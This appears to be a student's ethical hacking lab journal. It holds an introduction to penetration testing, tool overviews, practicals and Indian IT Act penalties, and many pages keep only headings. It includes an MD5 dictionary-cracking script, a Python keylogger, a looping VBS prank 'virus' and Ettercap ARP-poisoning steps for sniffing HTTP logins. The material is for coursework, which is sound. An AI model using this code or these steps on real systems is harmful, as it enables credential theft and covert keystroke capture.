18 Ajit Gupta EH Practical
18 Ajit Gupta EH Practical
18 Ajit Gupta EH Practical
: 18
Elective-3
Subject Name:
Ethical Hacking Lab
1
Ajit Gupta Roll No.: 18
Practical No. 1
I. INTRODUCTION
The term “hacker” has a dual usage in the computer industry today. Originally, the term was
defined as: “A person who enjoys learning the details of computer systems and how to stretch
their capabilities-as opposed to most users of computers, who prefer to learn only the
minimum amount necessary. One who programs enthusiastically or who enjoys
programming rather than just theorizing about programming”. This complimentary
description was often extended to the verb form “hacking,” which was used to describe the
rapid crafting of a new program or the making of changes to existing, usually complicated
software. Because of the increasing popularity of computers and their continued high cost,
access to them was usually restricted. When refused access to the computers, some users
would challenge the access controls that had been put in place. They would steal passwords
or account numbers by looking over someone's shoulder, explore the system for bugs that
might get them past the rules, or even take control of the whole system. They would do these
things in order to be able to run the programs of their choice, or just to change the limitations
under which their programs were running. Initially these computer intrusions were fairly
benign, with the most damage being the theft of computer time. Other times, these recreations
would take the form of practical jokes. However, these intrusions did not stay benign for
long. Occasionally the less talented, or less careful, intruders would accidentally bring down
a system or damage its files, and the system administrators would have to restart it or make
repairs. Other times, when these intruders were again denied access once their activities were
discovered, they would react with purposefully destructive actions. When the number of these
destructive computer intrusions became noticeable, due to the visibility of the system or the
extent of the damage inflicted, it became “news” and the news media picked up on the story.
Instead of using the more accurate term of “computer criminal,” the media began using the
term “hacker” to describe individuals who break into computers for fun, revenge, or profit.
Since calling someone a “hacker” was originally meant as a compliment, computer security
2
Ajit Gupta Roll No.: 18
professionals prefer to use the term “cracker” or “intruder” for those hackers who turn to the
dark side of hacking. For clarity, we will use the explicit terms “ethical hacker” and “criminal
hacker”.
With the growth of the Internet, computer security has become a major concern for businesses
and governments. They want to be able to take advantage of the Internet for electronic
commerce, advertising, information distribution and access, and other pursuits, but they are
worried about the possibility of being “hacked.” At the same time, the potential customers of
these services are worried about maintaining control of personal information that varies from
credit card numbers to social security numbers and home addresses. In their search for a way
to approach the problem, organizations came to realize that one of the best ways to evaluate
the intruder threat to their interests would be to have independent computer security
professionals attempt to break into their computer systems. This scheme is similar to having
independent auditors come into an organization to verify its bookkeeping records. In the case
of computer security, these “tiger teams” or “ethical hackers” would employ the same tools
and techniques as the intruders, but they would neither damage the target systems nor steal
information. Instead, they would evaluate the target systems' security and report back to the
owners with the vulnerabilities they found and instructions for how to remedy them. This
method of evaluating the security of a system has been in use from the early days of
computers. In one early ethical hack, the United States Air Force conducted a “security
evaluation” of the Multics operating systems for “potential use as a two-level (secret/top
secret) system.” Their evaluation found that while Multics was “significantly better than
other conventional systems,” it also had “ … vulnerabilities in hardware security, software
security, and procedural security” that could be uncovered with “a relatively low level of
effort.” The authors performed their tests under a guideline of realism, so that their results
would accurately represent the kinds of access that an intruder could potentially achieve.
They performed tests that were simple information-gathering exercises, as well as other tests
that were outright attacks upon the system that might damage its integrity. Clearly, their
3
Ajit Gupta Roll No.: 18
audience wanted to know both results. There are several other now unclassified reports that
describe ethical hacking activities within the U.S. military. With the growth of computer
networking, and of the Internet in particular, computer and network vulnerability studies
began to appear outside of the military establishment. Most notable of these was the work by
Farmer and Venema, which was originally posted to Usenet in December of 1993. They
discussed publicly, perhaps for the first time, this idea of using the techniques of the hacker
to assess the security of a system. With the goal of raising the overall level of security on the
Internet and intranets, they proceeded to describe how they were able to gather enough
information about their targets to have been able to compromise security if they had chosen
to do so. They provided several specific examples of how this information could be gathered
and exploited to gain control of the target, and how such an attack could be prevented. Farmer
and Venema elected to share their report freely on the Internet in order that everyone could
read and learn from it. However, they realized that the testing at which they had become so
adept might be too complex, time-consuming, or just too boring for the typical system
administrator to perform on a regular basis. For this reason, they gathered up all the tools that
they had used during their work, packaged them in a single, easy-to-use application, and gave
it away to anyone who chose to download it. Their program, called Security Analysis Tool
for Auditing Networks, or SATAN, was met with a great amount of media attention around
the world. Most of this early attention was negative, because the tool's capabilities were
misunderstood. The tool was not an automated hacker program that would bore into systems
and steal their secrets. Rather, the tool performed an audit that both identified the
vulnerabilities of a system and provided advice on how to eliminate them. Just as banks have
regular audits of their accounts and procedures, computer systems also need regular checking.
The SATAN tool provided that auditing capability, but it went one step further: it also advised
the user on how to correct the problems it discovered. The tool did not tell the user how the
vulnerability might be exploited, because there would be no useful point in doing so.
4
Ajit Gupta Roll No.: 18
Successful ethical hackers possess a variety of skills. First and foremost, they must be
completely trustworthy. While testing the security of a client's systems, the ethical hacker
may discover information about the client that should remain secret. In many cases, this
information, if publicized, could lead to real intruders breaking into the systems, possibly
leading to financial losses. During an evaluation, the ethical hacker often holds the “keys to
the company,” and therefore must be trusted to exercise tight control over any information
about a target that could be misused. The sensitivity of the information gathered during an
evaluation requires that strong measures be taken to ensure the security of the systems being
employed by the ethical hackers themselves: limited-access labs with physical security
protection and full ceiling-to-floor walls, multiple secure Internet connections, a safe to hold
paper documentation from clients, strong cryptography to protect electronic results, and
isolated networks for testing. Ethical hackers typically have very strong programming and
computer networking skills and have been in the computer and networking business for
several years. They are also adept at installing and maintaining systems that use the more
popular operating systems (e.g., UNIX or Windows NT) used on target systems. These base
skills are augmented with detailed knowledge of the hardware and software provided by the
more popular computer and networking hardware vendors. It should be noted that an
additional specialization in security is not always necessary, as strong skills in the other areas
imply a very good understanding of how the security on various systems is maintained. These
systems management skills are necessary for the actual vulnerability testing, but are equally
important when preparing the report for the client after the test. Finally, good candidates for
ethical hacking have more drive and patience than most people. Unlike the way someone
breaks into a computer in the movies, the work that ethical hackers do demands a lot of time
and persistence. This is a critical trait, since criminal hackers are known to be extremely
patient and willing to monitor systems for days or weeks while waiting for an opportunity. A
typical evaluation may require several days of tedious work that is difficult to automate.
Some portions of the evaluations must be done outside of normal working hours to avoid
5
Ajit Gupta Roll No.: 18
interfering with production at “live” targets or to simulate the timing of a real attack. When
they encounter a system with which they are unfamiliar, ethical hackers will spend the time
to learn about the system and try to find its weaknesses. Finally, keeping up with the ever-
changing world of computer and network security requires continuous education and review.
One might observe that the skills we have described could just as easily belong to a criminal
hacker as to an ethical hacker. Just as in sports or warfare, knowledge of the skills and
techniques of your opponent is vital to your success. In the computer security realm, the
ethical hacker's task is the harder one. With traditional crime anyone can become a shoplifter,
graffiti artist, or a mugger. Their potential targets are usually easy to identify and tend to be
localized. The local law enforcement agents must know how the criminals ply their trade and
how to stop them. On the Internet anyone can download criminal hacker tools and use them
to attempt to break into computers anywhere in the world. Ethical hackers have to know the
techniques of the criminal hackers, how their activities might be detected, and how to stop
them. Given these qualifications, how does one go about finding such individuals? The best
ethical hacker candidates will have successfully published research papers or released
popular open-source security software. The computer security community is strongly self-
policing, given the importance of its work. Most ethical hackers, and many of the better
computer and network security experts, did not set out to focus on these issues. Most of them
were computer users from various disciplines, such as astronomy and physics, mathematics,
computer science, philosophy, or liberal arts, who took it personally when someone disrupted
their work with a hack. One rule that IBM's ethical hacking effort had from the very
beginning was that we would not hire ex-hackers. While some will argue that only a “real
hacker” would have the skill to actually do the work, we feel that the requirement for absolute
trust eliminated such candidates. We likened the decision to that of hiring a fire marshal for
a school district: while a gifted ex-arsonist might indeed know everything about setting and
putting out fires, would the parents of the students really feel comfortable with such a choice?
This decision was further justified when the service was initially offered: the customers
themselves asked that such a restriction be observed. Since IBM's ethical hacking group was
formed, there have been numerous ex-hackers who have become security consultants and
6
Ajit Gupta Roll No.: 18
spokespersons for the news media. While they may very well have turned away from the
“dark side,” there will always be a doubt.
An ethical hacker's evaluation of a system's security seeks answers to three basic questions:
While the first and second of these are clearly important, the third is even more important: If
the owners or operators of the target systems do not notice when someone is trying to break
in, the intruders can, and will, spend weeks or months trying and will usually eventually
succeed. When the client requests an evaluation, there is quite a bit of discussion and
paperwork that must be done up front. The discussion begins with the client's answers to
questions similar to those posed by Garfinkel and Spafford:
3. How much time, effort, and money are you willing to expend to obtain adequate
protection?
7
Ajit Gupta Roll No.: 18
d) What if something unexpected happens during the test and brings the whole system down?
a) Information policy
b) Security policy
c) Computer use
d) User management
g) Configuration management
h) Design methodology
i) Disaster methodology
8
Ajit Gupta Roll No.: 18
Ethical hacking is a dynamic process since running through the penetration test once gives
the current set of security issues which subject to change over time therefore penetration
testing must be continuous to ensure that system movements and installation of new
applications do not introduce new vulnerabilities in the system. Areas to be tested:
• Application servers
• Firewalls and security devices
• Network security
• Wireless security
• An identified vulnerability at one layer may be protected at another layer minimizing the
associated risk of the vulnerability
9
Ajit Gupta Roll No.: 18
Nessus
Nessus is the world most famous vulnerability scanner, Nessus has been developed by Tenable network
security, it is available for free of cost for non-enterprise environment means for home user. It is a network
vulnerability scanner and use for finding the critical bugs on a system.
Nikto
Nikto is a free and open source tool, It checks for outdated versions of over 1000 servers, and version
specific problems on over 270 servers, It find out the default files and programs. It is a best tool for web
server penetration testing.
Kismet
Now a days Wardriving or Wireless LAN(WLAN) hacking is in market and different companies hire
penetration tester for doing test on wireless network, this test requires some tools, so Kismet is a best choice
for do this. Kismet identifies networks by passively collecting packets and detecting networks, which allows
it to detect (and given time, expose the names of) hidden networks and the presence of nonbeaconing
networks via data traffic.
MetaSploit
The best tool ever, Metasploit contain a database that has a list of available exploit and it is easy to use and
best tool for doing penetration testing, Metasploit framework is a sub project and is use to execute exploit
code against a machine and get the desire task done.
NetStumbler
Once again for wardriving, well netstumbler are available for windows based operating system, it works on
windows based operating system.It can detect WiFi that is IEEE 802.11b, 802.11g and 802.11a networks.
MiniStumbler is also available and works on Windows CE based system.
• Information Gathering
In this step, the testers collect as much information about the web application as possible and gain
understanding of its logic. The deeper the testers understand the test target, the more successful the
10
Ajit Gupta Roll No.: 18
penetration testing will be [3]. The information gathered will be used to create a knowledge base to
act upon in later steps. The testers should gather all information even if it seems useless and
unrelated since no one knows at the outset what bits of information are needed. This step
can be carried out in many different ways: by using public tools such as search engines;
using scanners; sending simple HTTP requests or specially crafted requests or walking
through the application.
• Vulnerability Analysis
Using the knowledge collected from the information gathering step, the testers then scan the
vulnerabilities that exist in the web application. The testers can conduct testing on
configuration management, business logic, authentication, session management,
authorization, data validation, denial of service, and web services . In this step, web server
vulnerabilities, authentication mechanism vulnerabilities, input-based vulnerabilities and
function-specific vulnerabilities are examined.
• Exploitation
After the vulnerability analysis step, the testers should have a good idea of the areas that will
be targeted for exploits. With the list of vulnerabilities on hand, the two applications were
then exploited.
• Test Analysis Phase
This phase is the interface of the results, the testers and the target entity. It is important that
the target entity is aware of typical attacker modus operandi, techniques and tools attackers
rely on, exploits they use, and any needless exposure of data the target is suffering from.
VI. APPROACHES TOWARDS ETHICAL HACKING (PENTEST). Any
combination of the following may be called for:
• Remote network.
This test simulates the intruder launching an attack across the Internet. The primary
defenses that must be defeated here are border firewalls, filtering routers, and Web servers.
• Remote dial-up network.
This test simulates the intruder launching an attack against the client's modem pools. The
primary defenses that must be defeated here are user authentication schemes. These kinds
11
Ajit Gupta Roll No.: 18
kinds of testing can be performed from three perspectives: as a total outsider, a “semi-
outsider,” or a valid user.
A total outsider has very limited knowledge about the target systems.
The only information used is available through public sources on the Internet. This test
represents the most commonly perceived threat. A well-defended system should not allow
this kind of intruder to do anything.
A semi-outsider has limited access to one or more of the organization's
computers or networks. This tests scenarios such as a bank allowing its depositors to use
special software and a modem to access information about their accounts. A well-
defended system should only allow this kind of intruder to access his or her own account
information.
A valid user has valid access to at least some of the organization's
computers and networks. This tests whether or not insiders with some access can extend
that access beyond what has been prescribed. A well-defended system should allow an
insider to access only the areas and resources that the system administrator has assigned
to the insider.
13
Ajit Gupta Roll No.: 18
14
Ajit Gupta Roll No.: 18
2. Email tracker
15
Ajit Gupta Roll No.: 18
16
Ajit Gupta Roll No.: 18
Practical No. 2
Aim: - Use software tools/commands to perform network scanning and sniffing and generate analysis
report.
Network scanning tools like
1) NMAP:
17
Ajit Gupta Roll No.: 18
18
Ajit Gupta Roll No.: 18
2) Angry IP Scanner:
19
Ajit Gupta Roll No.: 18
IDS Tool
1) Snort:
20
Ajit Gupta Roll No.: 18
21
Ajit Gupta Roll No.: 18
22
Ajit Gupta Roll No.: 18
Sniffing Tool
1) Wireshark:
23
Ajit Gupta Roll No.: 18
24
Ajit Gupta Roll No.: 18
Sniffing tool
1) Wireshark:
25
Ajit Gupta Roll No.: 18
Practical No:3
Malware Threats: Worms, viruses, Trojans
26
Ajit Gupta Roll No.: 18
Complicated String:
27
Ajit Gupta Roll No.: 18
B) Dictionary attack
28
Ajit Gupta Roll No.: 18
29
Ajit Gupta Roll No.: 18
dictattack.py:
import hashlib
flag=0
p_hash=input("Enter MD5 hash")
dictionary=input("Enter dictionary Filename:")
try:
password_file=open(dictionary,"r")
except:
print("No file found")
quit()
for word in password_file:
enc_word=word.encode('utf-8')
digest =hashlib.md5(enc_word.strip()).hexdigest()
if(digest==p_hash):
print("password has been found")
print("password is :" +word)
flag=1
break
if(flag==0):
print("No password found")
30
Ajit Gupta Roll No.: 18
Offline Tool:
31
Ajit Gupta Roll No.: 18
D) ARP Poising
Step 1 − Install the VMware workstation and install the Kali Linux operating system.
Step 2 − Login into the Kali Linux using username pass “root, toor”.
Step 3 − Make sure you are connected connected to local LAN and check the IP address
address by typing the
command ifconfig in the terminal.
32
Ajit Gupta Roll No.: 18
Step 4 − Open up the terminal and type “Ettercap –G” to start the graphical version of
Ettercap.
Step 5 − Now click the tab “sniff” in the menu bar and select “unified “unified sniffing” and click
OK to select the interface. We are going to use “eth0” which means Ethernet connection.
33
Ajit Gupta Roll No.: 18
Step 6 − Now click the “hosts” tab in the menu bar and click “scan for hosts”. It will start
scanning the whole network for the alive hosts.
Step 7 − Next, click the “hosts” tab and select “hosts list” to see the number of hosts available in
the network. This list also includes the default gateway address. We have to be careful when we
select the targets.
Step 8 − Now we have to choose the targets. targets. In MITM, our target is the host
machine, machine, and the route will be the router address to forward the traffic. In
an MITM attack, , the attacker intercepts the network and sniffs the packets.
packets. So, we will add the victim as “target 1” and the router address as “target
2.”
In VMware environment, environment, the default default gateway will always end
with “2” because “1” is assigned to the physical machine.
34
Ajit Gupta Roll No.: 18
Step 10 − Now click on “MITM” and click “ARP poisoning”. Thereafter, check the
option “Sniff remote connections” and click OK
Step 11 − Click “start” and select “start sniffing”. This will start ARP poisoning in
the network which means we have enabled our network card in “promiscuous
“mode” and now the local traffic can be sniffed. Note − We have allowed only
HTTP sniffing with, Ettercap, so don’t expect HTTPS packets to be sniffed with
this process.
Step 12 − Now it’s time to see the results; results; if our victim logged into some.
websites. You can see the results in the toolbar of Ettercap.
This is how sniffing works. You must have understood how easy it is to get the
HTTP credentials just by enabling ARP poisoning
35
Ajit Gupta Roll No.: 18
b) Ping:
36
Ajit Gupta Roll No.: 18
c) Netstat:
d) Ifconfig:
37
Ajit Gupta Roll No.: 18
38
Ajit Gupta Roll No.: 18
2. Steganography tools.
39
Ajit Gupta Roll No.: 18
40
Ajit Gupta Roll No.: 18
41
Ajit Gupta Roll No.: 18
Practical No:4
Developing and implementing malwares
42
Ajit Gupta Roll No.: 18
Log.py:-
import pynput
import logging
from pynput.keyboard import Key, Listener
log_dir = "D:/"
logging.basicConfig(filename = (log_dir + "keyLog.txt"),level=logging.DEBUG,
format='%(asctime)s: %(message)s')
def my_key_on_press(key):
logging.info(str(key))
with Listener(on_press=my_key_on_press) as listener:
listener.join()
B) Create Virus:
Virus.vbs
set x=wscript.createobject("wscript.shell")
do
wscript.sleep 100
x.sendkeys"{CAPSLOCK}"
x.sendkeys"{NUMLOCK}"
x.sendkeys"I am a Virus"
x.sendkeys"{SCROLLLOCK}"
loop
43
Ajit Gupta Roll No.: 18
Practical No:5
44
Ajit Gupta Roll No.: 18
45
Ajit Gupta Roll No.: 18
46
Ajit Gupta Roll No.: 18
47
Ajit Gupta Roll No.: 18
48
Ajit Gupta Roll No.: 18
Locate GoogleBot:
49
Ajit Gupta Roll No.: 18
50
Ajit Gupta Roll No.: 18
Practical No. 6
A) SQL injection :
Data in table:
51
Ajit Gupta Roll No.: 18
Login.php:
Index.php:
52
Ajit Gupta Roll No.: 18
B) Session hijacking:
Clear cookies:
Admin login:
53
Ajit Gupta Roll No.: 18
54
Ajit Gupta Roll No.: 18
User PHPSESSID :
55
Ajit Gupta Roll No.: 18
56
Ajit Gupta Roll No.: 18
Practical No. 7
57
Ajit Gupta Roll No.: 18
1) Ceaser Cipher:
58
Ajit Gupta Roll No.: 18
59
Ajit Gupta Roll No.: 18
2) Substitution Cipher:
60
Ajit Gupta Roll No.: 18
61
Ajit Gupta Roll No.: 18
3) Playfair Cipher:
62
Ajit Gupta Roll No.: 18
63
Ajit Gupta Roll No.: 18
4) Transposition:
64
Ajit Gupta Roll No.: 18
65
Ajit Gupta Roll No.: 18
66
Ajit Gupta Roll No.: 18
Practical No. 8
Pen Testing
&
Cyberlaw section under IT act 2000 - 43,65,66A, 66B,66C,66D,66E,66F,67A,
67B ,71,72,73 and 74
The person carrying out a penetration test is called a penetration tester or pen
tester. For the rest of the article, we will refer to it as a pen test or pen testing.
67
Ajit Gupta Roll No.: 18
Metasploit:
Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration
Testers.
What is the Metasploit Framework and How is it Used?
The Metasploit framework is a very powerful tool which can be used by cybercriminals
as well as ethical hackers to probe systematic vulnerabilities on networks and servers.
Because it’s an open-source framework, it can be easily customized and used with most
operating systems.
With Metasploit, the pen testing team can use ready-made or custom code and introduce
it into a network to probe for weak spots. As another flavor of threat hunting, once flaws
are identified and documented, the information can be used to address systemic
weaknesses and prioritize solutions.
The framework also carries nearly 500 payloads, some of which include:
68
Ajit Gupta Roll No.: 18
Conclusion:
69
Ajit Gupta Roll No.: 18
70
Ajit Gupta Roll No.: 18
C) Section 66A:
Description: Punishment for sending offensive messages through
communication service, etc.
Penalty: Any person who sends, by means of a computer resource or a
communication device
i. any information which he knows to be false, but for the purpose of
causing annoyance, inconvenience, danger, obstruction, insult, injury,
criminal intimidation, enmity, hatred or ill will, persistently by
making use of such computer resource or a communication device
OR
ii. any electronic mail or electronic mail message for the purpose of
causing annoyance or inconvenience or to deceive or to mislead the
addressee or recipient about the origin of such messages,
71
Ajit Gupta Roll No.: 18
D) Section 66B:
Description: Punishment for dishonestly receiving stolen computer
resource or communication device.
Penalty: Whoever dishonestly receive or retains any stolen computer resource
Or communication device knowing or having reason to believe the same to be
stolen computer resource or communication device, shall be punished with
imprisonment of either description for a term which may extend to three years or
with fine which may extend to rupees one lakh or with both.
E) Section 66C:
Description: Punishment for identity theft.
Penalty: Whoever, fraudulently or dishonestly make use of the electronic
signature, password or any other unique identification feature of any other
person, shall be punished with imprisonment of either description for a
term which may extend to three years and shall also be liable to fine which
may extend to rupees one lakh.
Case: On May 17, AIB had posted a video titled “If Apps were people”, in
which a women character Supriya, wants to sleep but the apps on her phone
turn out to be a major distraction. At 4.34 minutes of the video, one of the
characters in the video spells out the mobile number of another character
Rohan. Incidentally, the phone number turned out to be of one Rohina
Chhabra, a resident of Karnivihar area of Jaipur in Rajasthan. But for
Rohina, its has turned into a nightmare as getting continuous calls on her
number since then.
F) Section 66D:
Description: Punishment for cheating by personation by using computer
resource.
Penalty: Whoever, by means of any communication device or computer
resource cheats by personation, shall be punished with imprisonment of
either description for a term which may extend to three years and shall also
be liable to fine which may extend to one lakh rupees.
Case: A 17-year-old student was caught cheating during the Class X repeat
exam in Thane. A few minutes after the Maths Part I paper began at 10.30
am, the invigilator noticed the boy taking a picture of the question paper n
order to send to a friend for answers, the police said. The student was asked
to stop writing and taken aside, the police said. The authorities at the exam
centre then called the police. A case under section 66(D) of the Information
Technology Act was registered, the officer said, adding a probe was on.
72
Ajit Gupta Roll No.: 18
G) Section 66E:
Description: Punishment for violation of privacy.
Penalty: Whoever, intentionally or knowingly captures, publishes or
transmits the image of a private area of any person without his or her
consent, under circumstances violating the privacy of that person, shall be
punished with imprisonment which may extend to three years or with fine
not exceeding two lakh rupees, or with both.
Case: Jawaharlal Nehru University MMS scandal In a severe shock to the
prestigious and renowned institute – Jawaharlal Nehru University, a
pornographic MMS clip was apparently made in the campus and
transmitted outside the university.Some media reports claimed that the two
accused students initially tried to extort money from the girl in the video
but when they failed the culprits put the video out on mobile phones, on the
internet and even sold it as a CD in the blue film market
H) Section 66F:
Description: Punishment for cyber terrorism.
Penalty: Whoever commits or conspires to commit cyber terrorism shall be
punishable with imprisonment which may extend to imprisonment for life.
Case: The Mumbai police have registered a case of ‘cyber terrorism’—the
first in the state since an amendment to the Information Technology Act—
where a threat email was sent to the BSE and NSE on Monday. The MRA
Marg police and the Cyber Crime Investigation Cell are jointly probing the
case. The suspect has been detained in this case.The police said an email
challenging the security agencies to prevent a terror attack was sent by one
Shahab Md with an ID [email protected] to BSE’s administrative
email ID [email protected] at around 10.44 am on Monday.The
IP address of the sender has been traced to Patna in Bihar. The ISP is Sify.
The email ID was created just four minutes before the email was sent. “The
sender had, while creating the new ID, given two mobile numbers in the
personal details column. Both the numbers belong to a photo frame-maker
in Patna,’’ said an officer
I) Section 67A:
Description: Punishment for publishing or transmitting obscene material
in electronic form.
Penalty: Whoever publishes or transmits or causes to be published or
transmitted in the electronic form any material which contains sexually
explicit act or conduct shall be punished on first conviction with
73
Ajit Gupta Roll No.: 18
K) Section71:
Description: Penalty for misrepresentation.
Penalty: Whoever makes any misrepresentation to, or suppresses any
material fact from the Controller or the Certifying Authority for obtaining
any licence or 1 [electronic signature Certificate], as the case may be, shall
be punished with imprisonment for a term which may extend to two years,
74
Ajit Gupta Roll No.: 18
or with fine which may extend to one lakh rupees, or with both.
L) Section72:
Description: Penalty for Breach of confidentiality and privacy
Penalty: Save as otherwise provided in this Act or any other law for the
time being in force, if any person who, in pursuance of any of the powers
conferred under this Act, rules or regulations made thereunder, has
secured access to any electronic record, book, register, correspondence,
information, document or other material without the consent of the person
concerned discloses such electronic record, book, register,
correspondence, information, document or other material to any other
person shall be punished with imprisonment for a term which may extend
to two years, or with fine which may extend to one lakh rupees, or with
both.
M)Section73:
Description: Penalty for publishing electronic signature Certificate false
in certain particulars.
Penalty: No person shall publish a 1[electronic signature] Certificate or
otherwise make it available to any other person with the knowledge that
i. The Certifying Authority listed in the certificate has not issued it; or
ii. The subscriber listed in the certificate has not accepted it; or
iii. The certificate has been revoked or suspended
Unless such publication is for the purpose of verifying
[electronic signature] created prior to such suspension or revocation.
Any person who contravenes the provisions of sub-
section (1) shall be punished with imprisonment for a term which may
extend to two years, or with fine which may extend to one lakh rupees,
or with both.
N) Section 74:
Description: Publication for fraudulent purpose.
Penalty: Whoever knowingly creates, publishes or otherwise makes
available a 1 [electronic signature] Certificate for any fraudulent or
unlawful purpose shall be punished with imprisonment for a term which
may extend to two years, or with fine which may extend to one lakh
rupees, or with both.
75